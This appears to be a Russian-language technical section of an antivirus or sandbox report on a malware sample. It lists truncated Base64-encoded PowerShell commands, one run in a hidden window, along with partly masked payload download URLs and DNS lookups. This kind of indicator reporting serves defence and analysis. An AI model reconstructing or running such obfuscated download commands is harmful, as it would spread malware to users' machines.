Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQgBnAHIAagBrAHIAbwBiAGkAaQB5AHAAegAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBNAGkAegBqAGQAcQBoAGcAIAAjAD4AIAAkAE8AdABwAGgAYwBvAGIAcwByAGsAPQAnAFkAawB1...
- http://up####ithali.com/wordpress/cEiODB/
- http://sa###gheran.com/wp-includes/hfl0/
- http://co#####otelliondor.com/roomres/kag3iv/
- DNS ASK yo####linempire.com
- DNS ASK up####ithali.com
- DNS ASK ta####techeap.com
- DNS ASK sa###gheran.com
- DNS ASK co#####otelliondor.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAAQgBnAHIAagBrAHIAbwBiAGkAaQB5AHAAegAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBNAGkAegBqAGQAcQBoAGcAIAAjAD4AIAAkAE8AdABwAGgAYwBvAGIAcwByAGsAPQAnAFkAawB1...' (со скрытым окном)